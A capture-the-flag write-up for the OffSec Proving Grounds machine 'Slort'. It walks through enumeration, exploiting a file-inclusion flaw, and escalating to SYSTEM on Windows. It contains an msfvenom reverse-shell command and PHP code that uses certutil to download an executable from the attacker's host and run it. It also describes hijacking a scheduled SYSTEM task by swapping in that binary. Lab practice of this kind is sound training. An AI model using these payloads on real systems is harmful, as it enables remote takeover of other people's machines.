Slort

Writeup for Slort from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.70.53 all

Service Enumeration

HTTP (Port 4443)

gobuster dir -u http://192.168.70.53:4443/ -w /usr/share/dirb/wordlists/common.txt -t 40

We notice there is an interesting directory /site/.

Notice that the URL is /index.php?page=main.php. This probably means this site is vulnerable to LFI. We can test our theory by starting our listener and see if we can get a connection.

*** Take note: The target IP above and below may differ as I finished this box on another day. ***

Exploit

Since the above works, this means we can create a reverse shell and transfer it onto the box.

To do this we need 2 PHP files.

The first one is to download the reverse shellcode from our attack machine.

The second is the run the reverse shellcode.

We can generate the reverse shellcode using the following:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.66 LPORT=445 -f exe > reverse.exe

Next, we make our 2 PHP files.

<?php 
$exec = system('certutil.exe -urlcache -split -f "http://192.168.49.66:80/home/kali/pg/slort/reverse.exe
" shell.exe', $val); 
?> 

<?php 
$exec = system('reverse.exe', $val); 
?> 

Privesc

Manually enumerating, we found a backup folder in the root directory.

In this file info.txt, the file TFTP.exe is run every 5mins. Since this seems like a backup procedure, it's highly likely this is running as SYSTEM.

This is very similar to cronjobs on Linux systems. Let's move our reverse shell binary into this directory. We can then rename our reverse shell binary to TFTP so our reverse shell will be run by SYSTEM instead.

After waiting 5mins, we get SYSTEM.